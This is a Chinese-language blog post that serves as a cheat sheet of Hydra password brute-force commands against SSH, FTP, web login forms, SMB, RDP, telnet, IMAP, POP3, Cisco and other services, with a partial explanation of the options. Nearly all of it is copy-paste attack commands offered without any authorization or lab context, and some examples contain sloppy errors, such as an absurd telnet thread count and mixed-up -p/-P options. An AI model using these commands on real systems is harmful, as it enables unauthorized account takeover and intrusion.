利用hydra做大保健(爆破各种服务大集合)

利用hydra做大保健(爆破各种服务大集合)

  • 我遇见你 在烟雾袅袅 在浮生清欢

简单万金油:

Hydra –L 文件路径 –P 密码路径 t 线程 –vV 详细显示 –o 指定生成路径 –f 找到密码就停止 –e ns 空密码和指定密码试探 ip service 爆破服务

爆破ssh:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o /1 -vV ip ssh

爆破ftp:

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) –vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

爆破web登录(get):

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP

爆破web登录(post):

hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"


hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:wrong username orpassword"

https爆破:

hydra -m /index.php -l admin -P pass.txt 10.36.16.18 https

smb爆破:

hydra -l administrator -P pass.txt 10.36.16.18 smb

rdp爆破:

hydra -l administrator -P pass.txt –o /root/1 –V rdp://ip

telent爆破:

hydra ip telnet  -L 用户 -P 密码 -e ns -f -v -t 10000000000000000000

imap爆破:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

pop3爆破:

hydra -l admin -P pass.txt my.pop3.mail pop3

cisco爆破:

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

http-proxy爆破:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

teamspeak爆破:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

最后介绍一下各个参数吧:

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]   server service [OPT]
具体解释:
-R
继续从上一次进度接着破解
-S
大写,采用SSL链接
-s
小写,可通过这个参数指定非默认端口
-l
指定破解的用户,对特定用户破解
-L
指定用户名字典
-p
小写,指定密码破解,少用,一般是采用密码字典
-P
大写,指定密码字典
-e
可选选项,n:空密码试探,s:使用指定用户和密码试探
-C
使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数
-M
指定目标列表文件一行一条
-o
指定结果输出文件
-f
在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-t 加密的线程调小
同时运行的线程数,默认为16
-w

余生很长,请多指教。
利用hydra做大保健(爆破各种服务大集合)_第1张图片

你可能感兴趣的:(tools)